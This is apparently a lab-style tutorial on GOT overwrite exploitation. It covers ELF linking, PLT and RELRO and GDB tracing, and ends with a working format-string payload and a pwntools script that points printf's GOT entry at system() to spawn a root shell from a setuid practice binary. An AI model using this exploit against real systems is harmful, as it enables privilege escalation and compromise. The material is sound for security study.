description
09/19/2023

✏️ Overwriting Global Offset Table (GOT)

We're really deep now. Here, we will be focusing on overwriting the Global Offset Table (GOT)! We are going to be using another format string vulnerability, but there will be no buffer overflow this time.

Introduction

The Global Offset Table (GOT) is a section of an ELF program's memory that lets dynamically linked code run correctly. Simply put, it is a section inside of the program (ELF) that holds the addresses of functions that are dynamically linked.

Because the code reaches those functions through the GOT, it works regardless of the memory address where the program's code, data, or libraries are loaded at during runtime.

The GOT is responsible for mapping symbols (human-readable identifiers when compiled) to their correct addresses to facilitate Position Independent Code (PIC) and Position Independent Executables (PIE).

So, where is the GOT located in memory?

You can find the GOT being represented as the .got and .got.plt sections within the ELF file which are loaded into the program's memory at the start of execution.

The dynamic linker fills in the GOT's entries either at program startup or lazily, the first time a symbol is accessed.

Dynamic Resolving

With lazy binding, a function from a dynamic library is only looked up the first time it is called. The result is saved into the GOT so future function calls jump straight to their implementation, bypassing the dynamic resolver.
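To make the "resolve once, then cache" idea concrete, here is a toy Python model of lazy binding. It is only a sketch: the names `LIBRARY`, `resolve`, `got`, and `plt_stub` are made up for illustration and do not correspond to real loader code.

```python
# Toy model of lazy binding. This is NOT how ld.so is implemented;
# every name here is hypothetical and exists only for illustration.

LIBRARY = {"puts": lambda s: f"puts({s!r})"}  # stands in for libc

resolver_calls = []  # records every trip through the slow lookup path


def resolve(name):
    """Stand-in for the dynamic linker's symbol lookup."""
    resolver_calls.append(name)
    return LIBRARY[name]


got = {}  # stands in for the GOT: name -> resolved function


def plt_stub(name):
    """Return a callable that behaves like name@plt."""
    def stub(*args):
        if name not in got:          # first call: entry not resolved yet
            got[name] = resolve(name)
        return got[name](*args)      # later calls go straight through the GOT
    return stub


puts_plt = plt_stub("puts")
first = puts_plt("hello")
second = puts_plt("world")
```

After both calls, `resolver_calls` holds a single entry: the second call never touched the resolver because the address was already cached in `got`.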

Implications:

The GOT contains pointers into libraries, whose load addresses change between runs due to Address Space Layout Randomization (ASLR)
The GOT is also writeable (unless Full RELRO is in use, see below)

What is the Procedure Linkage Table (PLT)?

Before a function's address has been resolved, its GOT entry points back into that function's entry in the PLT. The PLT entry is a small stub of its own that is responsible for calling the dynamic linker with an identifier for the function that is to be resolved.

Something else to note:

If the binary that we are targeting is compiled with FULL RELRO, we will NOT be able to use this specific technique on the target. However, if it is compiled with PARTIAL RELRO, we will be able to!

What is RELRO?

Relocation Read-Only (RELRO) is a protection that makes some or all of the GOT read-only in order to stop GOT overwrites.

Partial RELRO:

This reorders the ELF sections so the GOT sits above the program's variables (so an overflow in a global variable cannot run into it) and marks .got read-only. The .got.plt stays writeable, so this does not prevent format string overwrites.

Full RELRO:

This makes the GOT completely read-only, so even format string vulnerabilities will not be able to overwrite anything. It is not always enabled by default because it slows down program startup: the dynamic linker needs to resolve all function addresses up front instead of lazily.

Set Proper File Permissions

sudo chown root:root got_overwrite
sudo chmod 4655 got_overwrite
sudo chown root:root flag.txt
sudo chmod 600 flag.txt

Enumeration

file:

{% code overflow="wrap" %}

file got_overwrite
got_overwrite: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=57da01c938d00b9c9beb3a58299d8c64766d748c, for GNU/Linux 3.2.0, not stripped

{% endcode %}

32-bit Binary
Dynamically linked to libc
Not stripped

checksec:

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   71 Symbols        No    0               2            got_overwrite

Partial RELRO
- This is pertaining to the vulnerability that we will be targeting
- Maps the .got section as read-only (but not .got.plt)
Stack Canary is ENABLED -- Protected functions place a canary value on the stack between their local buffers and the saved return address
- Before the function returns, the canary value is checked to ensure that it is the same original value, helping to mitigate against buffer overflow attacks
- If the value is not the same, a stack smashing error will be issued, crashing the program
NX is ENABLED -- So we do not have an executable stack

Messing with the Program

We can see that our input is being directly reflected back at us presumably with printf() or something similar.

There must be a while(true) loop going on because the program will infinitely await user-input and not exit.

Unable to segfault from overflow

There seems to be some kind of buffer/sizeof() checking going on since we cannot overflow the buffer.

Reversing

Keep in mind that I renamed variables, added comments, etc.

main():

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */

undefined4 main(void)

{
  int iVar1;
  undefined4 uVar2;
  int in_GS_OFFSET;
  
  iVar1 = *(int *)(in_GS_OFFSET + 20);
  setuid(0);
  setgid(0);
                    /* Vulnerable Functions -- Format String Bug */
  vuln();
  uVar2 = 0;
  if (iVar1 != *(int *)(in_GS_OFFSET + 0x14)) {
                    /* Stack Canary -- __stack_chk_fail_local indicates usage of canaries */
    uVar2 = __stack_chk_fail_local();
  }
  return uVar2;
}

setuid(0) and setgid(0) set the process's user and group IDs to root, so everything the binary does from here on runs with root permissions
We call vuln() and, upon further analysis (which you will see below), we were able to identify a format string vulnerability
__stack_chk_fail_local() indicates that the binary is protected by stack canaries

vuln():

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */

void vuln(void)

{
  int in_GS_OFFSET;
  char buffer [300];
  undefined4 local_10;
  
  local_10 = *(undefined4 *)(in_GS_OFFSET + 0x14);
  do {
                    /* fgets() is limited to the size of the buffer (300 bytes),
                       preventing buffer overflow. Also keep in mind canaries are enabled. */
    fgets(buffer,300,_stdin);
                    /* No format string was specified -- printf() format string bug identified */
    printf(buffer);
  } while( true );
}

Instantiate a char-based buffer with a size of 300 bytes
fgets() is given the size of our buffer (300 bytes), so it stores at most 299 characters plus the terminating null byte and nothing more
printf(buffer) is a format string vulnerability because our input is used as the format string itself instead of being passed as an argument to a fixed format such as "%s"
while( true ) allows the program to loop infinitely

Plan of Attack

Notice how we have a format string bug (remember, this is because our printf() call uses our input as its format string). With it, we can send an input that overwrites an entry of the GOT: we find the address of printf() in the GOT and overwrite it with the address of system().

Since we are constrained to an infinite loop, what will happen is:

We will loop around again
Take an input from us
Then, instead of calling printf() with the buffer, it will call system() with the buffer
If our buffer is "/bin/sh", this will call "/bin/sh"
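The plan above can be sketched as a toy simulation in Python. This is only a model of the idea, not an exploit: `fake_printf`, `fake_system`, `got`, and `vuln_iteration` are hypothetical stand-ins for the real functions and the real GOT slot.

```python
# Toy simulation of the plan: the loop always calls "printf" through its
# GOT slot, so replacing that slot changes what the same call site runs.
# All names are hypothetical stand-ins.

def fake_printf(buf):
    return f"printf echoes: {buf}"


def fake_system(cmd):
    return f"system runs: {cmd}"


got = {"printf": fake_printf}  # stands in for the printf entry in .got.plt


def vuln_iteration(user_input):
    """One pass of the while(true) loop: read input, call printf via the GOT."""
    return got["printf"](user_input)


before = vuln_iteration("/bin/sh")

# This assignment is what the %n write accomplishes in the real exploit.
got["printf"] = fake_system

after = vuln_iteration("/bin/sh")
```

The call site in `vuln_iteration` never changes. Only the pointer it reads does, which is why the next loop iteration ends up in `system()` with our buffer as its argument.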

Understanding GOT vs Procedure Linkage Table (PLT), `GOT.PLT` and `PLT.GOT`

.got:

This is the Global Offset Table (GOT). This is where the actual table of offsets is located, as filled in by the linker for external symbols.

.plt:

This is the Procedure Linkage Table (PLT). These are stubs that look up the addresses in the .got.plt section and either jump to the right address or trigger the code in the linker to look up the address.

.got.plt:

This is the GOT for the PLT. It contains the target addresses after they have been looked up or an address back in the .plt to trigger the lookup.

.plt.got:

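This contains PLT-style stubs that jump through entries of the .got (rather than the .got.plt). Those entries are filled in at load time, so these stubs do not trigger a lazy lookup.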

The PLT and the GOT work together to perform linking.

For example, when you call printf() in C and compile it as an ELF binary, the call does not go straight to printf(). Rather, it is compiled as a call to printf@plt, which you can see in GDB:

The GOT is a massive table of addresses and these are the actual locations in memory of the libc functions.

When the PLT gets called it will read the GOT address and redirect execution from there.

When the GOT entry has not been resolved yet, the PLT will coordinate with ld.so (A.K.A. the dynamic linker/loader shared object) to get the function address and store it in the GOT.

Key Takeaways

Calling the PLT address of a function is the same as simply calling the function itself.

The GOT holds the addresses of functions in libc, and the GOT itself lives within the binary.

Viewing the PLT in Action

After viewing the disassembly for a particular function, I was able to locate the call to fgets(), set a breakpoint on fgets@plt, and view the inside of the PLT in gdb. After stepping into it, we can see a jump instruction that acts like a call through a function pointer: it dereferences a memory location and jumps to the resulting address.

Remember, if ASLR is enabled on your machine, the libc addresses will be different each time you run the binary. The PLT and .got.plt addresses stay the same because the binary has no PIE. (GDB also disables ASLR for the process it debugs by default.)

info functions
0x08049040 fgets@plt

b *0x08049040

r

Since we set a breakpoint at fgets@plt, that is where our instruction pointer (EIP) stops until we continue execution.

We can use the following command to explicitly view the instruction that places us in the PLT:

x/i $pc
or
x/i $eip

=> 0x8049040 <fgets@plt>:       jmp    DWORD PTR ds:0x804c010

We then see a jmp instruction to a specific address.

However, this is not an ordinary direct jmp. It is an indirect jump through a memory location, which is what it looks like when a function pointer is being used.

NOTE: This pointer is in the .got.plt section of the binary.

We can then view the dereference:

x/wx 0x804c010

0x804c010 <fgets@got.plt>:      0x08049046

follow the jmp:

x/2i $pc
=> 0x8049046 <fgets@plt+6>:     push   0x8
   0x804904b <fgets@plt+11>:    jmp    0x8049020

We can see that we immediately jumped to the next instruction. This is because we have not called fgets() before and we need to trigger the lookup first.

It will push the number 0x8 (the offset of the relocation entry for fgets()) onto the stack and then jump to the routine that looks up the symbol.

This all happens in the beginning of the .plt section.

Let's find out what this stub does:

x/2i $pc
=> 0x8049020:   push   DWORD PTR ds:0x804c004
   0x8049026:   jmp    DWORD PTR ds:0x804c008

We push the value of the second entry of .got.plt and then jump to the address stored in the third entry.

x/2x 0x804c004
0x804c004:      0xf7f4aa40      0xf7f25fe0

We can obtain the PID of our currently debugged binary by running info inferiors inside of pwndbg.

info inferiors 
  Num  Description       Connection           Executable
* 1    process 12579     1 (native)

PID is 12579

We can then read from /proc/pid/maps for more information.

 cat /proc/12579/maps

We can then see that the first entry points into the data segment of ld.so and the 2nd into the executable region.

In other words, we are asking ld.so to look up the fgets() symbol. These two addresses in the .got.plt section are populated by the linker/loader (ld.so) at the time it is loading the binary.
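Checking which mapping an address falls into can also be done with a few lines of Python instead of reading /proc/pid/maps by eye. The sketch below assumes the usual maps line layout (`start-end perms offset dev inode path`). The `SAMPLE` text is a made-up excerpt chosen so the two addresses from above land somewhere; it is not the real output of this session.

```python
def parse_maps(text):
    """Parse /proc/<pid>/maps text into (start, end, perms, path) tuples."""
    regions = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        start, end = (int(part, 16) for part in fields[0].split("-"))
        path = fields[5] if len(fields) > 5 else ""
        regions.append((start, end, fields[1], path))
    return regions


def find_region(regions, addr):
    """Return (perms, path) of the mapping containing addr, or None."""
    for start, end, perms, path in regions:
        if start <= addr < end:
            return perms, path
    return None


# HYPOTHETICAL excerpt for illustration only, not captured from the target.
SAMPLE = """\
f7f21000-f7f46000 r-xp 00001000 08:01 1234 /lib/ld-linux.so.2
f7f49000-f7f4b000 rw-p 00028000 08:01 1234 /lib/ld-linux.so.2
"""

regions = parse_maps(SAMPLE)
second_entry = find_region(regions, 0xF7F4AA40)  # value at 0x804c004
third_entry = find_region(regions, 0xF7F25FE0)   # value at 0x804c008
```

On a live process you would pass the contents of `/proc/<pid>/maps` to `parse_maps()` instead of `SAMPLE`.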

If we step through the instructions a few times using ni, we will ultimately get to fgets().

info symbol $pc
fgets in section .text of /lib/i386-linux-gnu/libc.so.6

Let's print out our stack:

x/4wx $esp

We can actually see how we get from main to fgets() very quickly just by using the disassembly of fgets@plt.

disass 'fgets@plt'
Dump of assembler code for function fgets@plt:
   0x08049040 <+0>:     jmp    DWORD PTR ds:0x804c010
   0x08049046 <+6>:     push   0x8
   0x0804904b <+11>:    jmp    0x8049020
End of assembler dump.

x/wx 0x804c010
0x804c010 <fgets@got.plt>:      0xf7d3d690

info symbol 0xf7d3d690
fgets in section .text of /lib/i386-linux-gnu/libc.so.6

We can see a call to fgets@plt will result immediately in a jmp to the fgets() address loaded via dynamic linking from libc.

So, how did the .got.plt get updated? The pointer from the beginning of the GOT was passed as an argument to ld.so, along with the 0x8 pushed by the PLT stub. ld.so did its black magic, looked up fgets(), and inserted the proper address into the GOT to replace the previous address, which pointed to the next instruction in the PLT.

Okay great, but how can we exploit this?

Since our ultimate goal is to take control of the flow of execution of the program, we need to remember that the .got.plt section is a giant array of function pointers.

So, could we overwrite one of these and control execution from there?

Any memory corruption primitive that will let you write to an arbitrary address will allow you to overwrite a GOT entry.

Ultimately, .got.plt is very attractive for format string bugs and other arbitrary write exploits.

When your target binary lacks PIE, this will cause the .got.plt to be loaded at a fixed address.

Enabling FULL RELRO will protect against these kinds of attacks by preventing writes to the GOT, at the cost of slower program startup.

Exploitation

Printing values off of the stack with the format string bug:

%p %p %p
0x12c 0xf7f80620 0x80491b1
%s
Segmentation fault

Why did this happen?

We are able to print pointers from the stack by using %p as the format specifier.

However, when we use %s, printf() treats the first value (0x12c) as a pointer and tries to print the string stored at that address. This results in a segmentation fault because 0x12c is NOT a valid (mapped) location in memory.
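The difference between %p and %s can be modelled in a few lines of Python. This is a deliberately tiny sketch and not how printf() is implemented: `toy_printf`, the `stack` list, and the `memory` dict are hypothetical, and only `%p`, `%s`, and their positional forms (`%N$p`, `%N$s`) are handled.

```python
import re


class SegmentationFault(Exception):
    """Raised when the toy printf dereferences an unmapped address."""


def toy_printf(fmt, stack, memory):
    """Tiny model of printf: %p prints a stack value, %s dereferences it."""
    out = []
    pos = 0
    next_arg = 0
    for match in re.finditer(r"%(?:(\d+)\$)?([ps])", fmt):
        out.append(fmt[pos:match.start()])
        pos = match.end()
        if match.group(1):                      # positional form, 1-based
            value = stack[int(match.group(1)) - 1]
        else:                                   # next argument in order
            value = stack[next_arg]
            next_arg += 1
        if match.group(2) == "p":
            out.append(hex(value))              # just print the value
        elif value in memory:
            out.append(memory[value])           # follow the pointer
        else:
            raise SegmentationFault(hex(value))
    out.append(fmt[pos:])
    return "".join(out)


stack = [0x12C, 0xF7F80620, 0x80491B1]  # the three values leaked above
memory = {}                             # nothing is mapped at 0x12c

leak = toy_printf("%p %p %p", stack, memory)

try:
    toy_printf("%s", stack, memory)
    crashed = False
except SegmentationFault:
    crashed = True
```

`%p` only prints what is on the stack, so it is always safe. `%s` follows the value as a pointer, which is why the first stack value being 0x12c is enough to crash the real program.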

Fuzzing `printf()` Format Vulnerability

Read more about Format String Vulnerabilities here:

{% embed url="https://axcheron.github.io/exploit-101-format-strings/" %}

fuzz.py:

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./got_overwrite', checksec=False)

# Create process (level used to reduce noise)
p = process(level='error')

# Let's fuzz x values (positional arguments are numbered from 1)
for i in range(1, 100):
    try:
        # Format the counter
        # e.g. %2$x will print the 2nd argument on the stack as hex
        p.sendline('%{}$x'.format(i).encode())
        # Receive the response
        result = p.recvline().decode()
        # If the item from the stack isn't empty, print it
        if result:
            print(str(i) + ': ' + str(result).strip())
    except EOFError:
        pass

This script sends %1$x through %99$x, printing out the values on the stack in hex format one position at a time.

We want to focus on the %n format specifier.

When performing this kind of technique, we want to fuzz and print out values on the stack when injecting arbitrary data to see where our data/input ends up.

Manual Approach (just messing with the program)

We can incrementally utilize position-based parameters with our input and print out or inject in a specific part of the stack.

See an example below:

Pay attention to the decrementing value immediately after the %. We start with %6 and go to %4 in order to identify where our input ends up on the stack.

./got_overwrite

AAAA%6$p
AAAA0xf7fb000a
AAAA%5$p
AAAA0x70243525
AAAA%4$p
AAAA0x41414141

Okay cool, what is 41414141 converted to ASCII?

We can use the pwntools tool, unhex 41414141 to figure this out.

AAAA!

Great, we have identified where our data is being injected onto the stack.
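If pwntools is not at hand, the same conversion can be done with the standard library. The sketch below unpacks the leaked 32-bit values in little-endian order, which is how they sit in memory on this i386 target. `dword_to_bytes` is just an illustrative helper name.

```python
import struct


def dword_to_bytes(value):
    """Return the 4 bytes of a 32-bit value as laid out in little-endian memory."""
    return struct.pack("<I", value)


marker = dword_to_bytes(0x41414141)      # leaked by %4$p
next_dword = dword_to_bytes(0x70243525)  # leaked by %5$p

print(marker)      # b'AAAA'
print(next_dword)  # b'%5$p'
```

The second value is a nice sanity check: position 5 holds the next four bytes of our own input, `%5$p`, which confirms that the buffer starts at position 4.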

So we need to answer which argument position our input lands in. That tells us which position will hold the address that the %n write operation uses.

Manual Exploitation Methodology -- `printf()` write exploit w/ `%n`

We can use the following methodology to help us craft an exploit manually:

{% code overflow="wrap" %}

# Need to overwrite 0x0804c00c (GOT.printf) with 0xf7dff040 (LIBC.system)

# It means writing 0xf7df (63455) @ 0x0804c00c + 2 = 0x0804c00e (high order)
# and 0xf040 (61504) @ 0x0804c00c (low order)

# Now, we have to figure out the value to set for the padding. Here is the formula :
[The value we want] - [The bytes already written] = [The value to set].

# Let’s start with the low order bytes :
It’ll be 61504 - 8 = 61496, because we already wrote 8 bytes (the two 4 bytes addresses).

# Then, the high order bytes :
It’ll be 63455 - 61504 = 1951, because we already wrote 61504 bytes (the two 4 bytes addresses and 61496 bytes from the previous writing).

# Now we can construct the exploit (note our write offset is %4 so we want [%4,%5] as offsets instead of [%7,%8]) :

It’ll be : \x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn. Let me explain :
    \x0c\xc0\x04\x08 or 0x0804c00c (in reverse order) points to the low order bytes.
    \x0e\xc0\x04\x08 or 0x0804c00e (in reverse order) points to the high order bytes.
    %61496x will write 61496 bytes on the standard output.
    %4$hn will write the number of bytes printed so far, 8 + 61496 = 61504 (or 0xf040), at the first address specified (0x0804c00c).
    %1951x will write 1951 bytes on the standard output.
    %5$hn will write the number of bytes printed so far, 8 + 61496 + 1951 = 63455 (or 0xf7df), at the second address specified (0x0804c00e).

python2 -c 'print("\x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn")' > payload

* Based on excellent blogpost: https://axcheron.github.io/exploit-101-format-strings/

{% endcode %}
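The padding arithmetic above can be reproduced with a short Python 3 helper. This is a sketch under a few assumptions: a 32-bit little-endian target, the two addresses placed at the very start of the input, and the low half written first. The names `padding` and `build_hn_payload` are made up for this example.

```python
import struct


def padding(want, written):
    """Characters still to print so the running count ends in `want` (mod 0x10000)."""
    pad = (want - written) % 0x10000
    # %Nx can print up to 8 hex digits even when N is smaller, so keep N >= 8.
    return pad if pad >= 8 else pad + 0x10000


def build_hn_payload(target, value, offset):
    """Build a two-write %hn payload that stores the 32-bit `value` at `target`.

    `offset` is the argument position where our input starts (4 in this binary).
    """
    low, high = value & 0xFFFF, (value >> 16) & 0xFFFF
    addrs = struct.pack("<II", target, target + 2)  # low half, then high half
    pad_low = padding(low, len(addrs))
    pad_high = padding(high, len(addrs) + pad_low)
    fmt = "%{}x%{}$hn%{}x%{}$hn".format(pad_low, offset, pad_high, offset + 1)
    return addrs + fmt.encode()


# Numbers from the notes above: GOT.printf, LIBC.system, write offset 4.
payload = build_hn_payload(0x0804C00C, 0xF7DFF040, 4)
print(payload)
```

With the numbers from the notes, this produces the same bytes as the hand-built payload. It does not check for bytes that fgets() or printf() would choke on (such as a newline or a null byte inside an address), so treat it as a calculator rather than a general-purpose tool.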

Obtaining GOT.printf address:

Load the binary in Ghidra and open up the Program Tree. Inside of .got.plt, you will see an EXTERNAL reference to printf(). Use that address and you will have your GOT.printf address.

Program Trees

Listing View // Obtaining GOT.printf address

Obtain libc base address (this only matches the running process when ASLR is disabled):

ldd got_overwrite
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d7f000)
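Pulling the base address out of the ldd output and turning it into a function address is simple arithmetic. The sketch below parses the line shown above. The `SYSTEM_OFFSET` value is an assumption: it is just the difference between the LIBC.system address and the libc base quoted in this write-up, and it will be different for other libc builds.

```python
import re


def libc_base_from_ldd(ldd_output):
    """Return the libc load address reported by ldd, or None if not found."""
    for line in ldd_output.splitlines():
        match = re.search(r"libc\.so\.6 => \S+ \((0x[0-9a-fA-F]+)\)", line)
        if match:
            return int(match.group(1), 16)
    return None


LDD_LINE = "libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d7f000)"

# ASSUMPTION: derived from the two addresses in this write-up
# (0xf7dff040 - 0xf7d7f000); not verified against the actual libc file.
SYSTEM_OFFSET = 0x80040

base = libc_base_from_ldd(LDD_LINE)
system_addr = base + SYSTEM_OFFSET

print(hex(base))
print(hex(system_addr))
```

A quick sanity check on any base address is that it should be page aligned, meaning its last three hex digits are 000.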

Automated Exploit

exploit.py:

from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Function to be called by FmtStr
def send_payload(payload):
    io.sendline(payload)
    return io.recvline()


# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())


# Set up pwntools for the correct architecture
exe = './got_overwrite'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Found manually with `ldd got_overwrite` (only valid while ASLR is off)
libc = elf.libc
libc.address = 0xf7d7f000

# Find the offset for format string write
format_string = FmtStr(execute_fmt=send_payload)
info("format string offset: %d", format_string.offset)

# Print address to overwrite (printf) and what we want to write (system)
info("address to overwrite (elf.got.printf): %#x", elf.got.printf)
info("address to write (libc.functions.system): %#x", libc.symbols.system)

# Overwrite printf() in GOT with Lib-C system()
# Manual, like in notes.txt
# format_string.write(0x0804c00c, p16(0xf040))  # Lower-order
# format_string.write(0x0804c00e, p16(0xf7df))  # Higher-order
# Or automagically
format_string.write(elf.got.printf, libc.symbols.system)

# Execute the format string writes
format_string.execute_writes()

# Get our flag!
io.sendline(b'/bin/sh')
io.interactive()

Successful Exploitation
